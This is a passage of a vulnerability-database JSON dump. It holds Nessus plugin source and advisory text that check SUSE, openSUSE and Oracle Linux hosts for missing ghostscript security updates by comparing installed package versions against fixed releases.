reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libspectre1-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libspectre1-debuginfo-0.2.7-12.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:35:46", "description": "This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-19475: Fixed bypass of an intended access\n restriction in psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access\n restriction in psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access\n restriction in psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used\n correctly in LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through\n 1Policy operator (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved\n execution stacks (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by\n bypassing executeonly (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by\n specially crafted PostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331) :\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n - For release summary see:\n http://www.ghostscript.com/doc/9.26/News.htm\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-17T00:00:00", "title": "openSUSE Security Update : ghostscript (openSUSE-2018-1552)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "modified": "2018-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ghostscript-mini-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-x11", "p-cpe:/a:novell:opensuse:ghostscript", "p-cpe:/a:novell:opensuse:ghostscript-mini", "p-cpe:/a:novell:opensuse:libspectre1", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:libspectre-debugsource", "p-cpe:/a:novell:opensuse:ghostscript-x11-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-devel", "p-cpe:/a:novell:opensuse:ghostscript-debugsource", "p-cpe:/a:novell:opensuse:libspectre-devel", "p-cpe:/a:novell:opensuse:libspectre1-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-mini-devel", "p-cpe:/a:novell:opensuse:ghostscript-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-mini-debugsource"], "id": "OPENSUSE-2018-1552.NASL", "href": "https://www.tenable.com/plugins/nessus/119711", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1552.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119711);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2018-17183\",\n \"CVE-2018-17961\",\n \"CVE-2018-18073\",\n \"CVE-2018-18284\",\n \"CVE-2018-19409\",\n \"CVE-2018-19475\",\n \"CVE-2018-19476\",\n \"CVE-2018-19477\"\n );\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"openSUSE Security Update : ghostscript (openSUSE-2018-1552)\");\n script_summary(english:\"Check for the openSUSE-2018-1552 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-19475: Fixed bypass of an intended access\n restriction in psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access\n restriction in psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access\n restriction in psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used\n correctly in LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through\n 1Policy operator (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved\n execution stacks (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by\n bypassing executeonly (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by\n specially crafted PostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331) :\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n - For release summary see:\n http://www.ghostscript.com/doc/9.26/News.htm\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117331\"\n );\n # http://www.ghostscript.com/doc/9.26/News.htm\n script_set_attribute(attribute:\"see_also\", value:\"https://www.ghostscript.com/doc/9.26/News.htm\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111479\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111480\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112229\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117274\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117313\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117327\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117331\");\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-debuginfo-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-debugsource-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-devel-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-debuginfo-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-debugsource-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-devel-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-x11-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-x11-debuginfo-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre-debugsource-0.2.8-lp150.2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre-devel-0.2.8-lp150.2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre1-0.2.8-lp150.2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre1-debuginfo-0.2.8-lp150.2.6.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript-mini / ghostscript-mini-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T17:23:27", "description": "From Red Hat Security Advisory 2018:3834 :\n\nAn update for ghostscript is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Ghostscript suite contains utilities for rendering PostScript and\nPDF documents. Ghostscript translates PostScript code to common bitmap\nformats so that the code can be displayed or printed.\n\nSecurity Fix(es) :\n\n* ghostscript: Incorrect free logic in pagedevice replacement (699664)\n(CVE-2018-16541)\n\n* ghostscript: Incorrect 'restoration of privilege' checking when\nrunning out of stack during exception handling (CVE-2018-16802)\n\n* ghostscript: User-writable error exception table (CVE-2018-17183)\n\n* ghostscript: Saved execution stacks can leak operator arrays\n(incomplete fix for CVE-2018-17183) (CVE-2018-17961)\n\n* ghostscript: Saved execution stacks can leak operator arrays\n(CVE-2018-18073)\n\n* ghostscript: 1Policy operator allows a sandbox protection bypass\n(CVE-2018-18284)\n\n* ghostscript: Type confusion in setpattern (700141) (CVE-2018-19134)\n\n* ghostscript: Improperly implemented security check in zsetdevice\nfunction in psi/zdevice.c (CVE-2018-19409)\n\n* ghostscript: Uninitialized memory access in the aesdecode operator\n(699665) (CVE-2018-15911)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Tavis Ormandy (Google Project Zero) for\nreporting CVE-2018-16541.\n\nBug Fix(es) :\n\n* It has been found that ghostscript-9.07-31.el7_6.1 introduced\nregression during the handling of shading objects, causing a 'Dropping\nincorrect smooth shading object' warning. With this update, the\nregression has been fixed and the described problem no longer occurs.\n(BZ#1657822)", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-19T00:00:00", "title": "Oracle Linux 7 : ghostscript (ELSA-2018-3834)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-16802", "CVE-2018-16541", "CVE-2018-19409"], "modified": "2018-12-19T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ghostscript-cups", "p-cpe:/a:oracle:linux:ghostscript-gtk", "p-cpe:/a:oracle:linux:ghostscript", "p-cpe:/a:oracle:linux:ghostscript-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:ghostscript-doc"], "id": "ORACLELINUX_ELSA-2018-3834.NASL", "href": "https://www.tenable.com/plugins/nessus/119757", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:3834 and \n# Oracle Linux Security Advisory ELSA-2018-3834 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119757);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/21\");\n\n script_cve_id(\n \"CVE-2018-15911\",\n \"CVE-2018-16541\",\n \"CVE-2018-16802\",\n \"CVE-2018-17183\",\n \"CVE-2018-17961\",\n \"CVE-2018-18073\",\n \"CVE-2018-18284\",\n \"CVE-2018-19134\",\n \"CVE-2018-19409\"\n );\n script_xref(name:\"RHSA\", value:\"2018:3834\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"Oracle Linux 7 : ghostscript (ELSA-2018-3834)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:3834 :\n\nAn update for ghostscript is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Ghostscript suite contains utilities for rendering PostScript and\nPDF documents. Ghostscript translates PostScript code to common bitmap\nformats so that the code can be displayed or printed.\n\nSecurity Fix(es) :\n\n* ghostscript: Incorrect free logic in pagedevice replacement (699664)\n(CVE-2018-16541)\n\n* ghostscript: Incorrect 'restoration of privilege' checking when\nrunning out of stack during exception handling (CVE-2018-16802)\n\n* ghostscript: User-writable error exception table (CVE-2018-17183)\n\n* ghostscript: Saved execution stacks can leak operator arrays\n(incomplete fix for CVE-2018-17183) (CVE-2018-17961)\n\n* ghostscript: Saved execution stacks can leak operator arrays\n(CVE-2018-18073)\n\n* ghostscript: 1Policy operator allows a sandbox protection bypass\n(CVE-2018-18284)\n\n* ghostscript: Type confusion in setpattern (700141) (CVE-2018-19134)\n\n* ghostscript: Improperly implemented security check in zsetdevice\nfunction in psi/zdevice.c (CVE-2018-19409)\n\n* ghostscript: Uninitialized memory access in the aesdecode operator\n(699665) (CVE-2018-15911)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Tavis Ormandy (Google Project Zero) for\nreporting CVE-2018-16541.\n\nBug Fix(es) :\n\n* It has been found that ghostscript-9.07-31.el7_6.1 introduced\nregression during the handling of shading objects, causing a 'Dropping\nincorrect smooth shading object' warning. With this update, the\nregression has been fixed and the described problem no longer occurs.\n(BZ#1657822)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2018-December/008339.html\");\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ghostscript-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ghostscript-9.07-31.el7_6.6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ghostscript-cups-9.07-31.el7_6.6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ghostscript-devel-9.07-31.el7_6.6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ghostscript-doc-9.07-31.el7_6.6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ghostscript-gtk-9.07-31.el7_6.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript / ghostscript-cups / ghostscript-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-22T17:54:39", "description": " - rebase to latest upstream version 9.26\n\n - Security fix for CVE-2018-19478 CVE-2018-19134\n CVE-2018-19477 CVE-2018-19476 CVE-2018-19475\n CVE-2018-19409 CVE-2018-18284 CVE-2018-18073\n CVE-2018-17961\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has 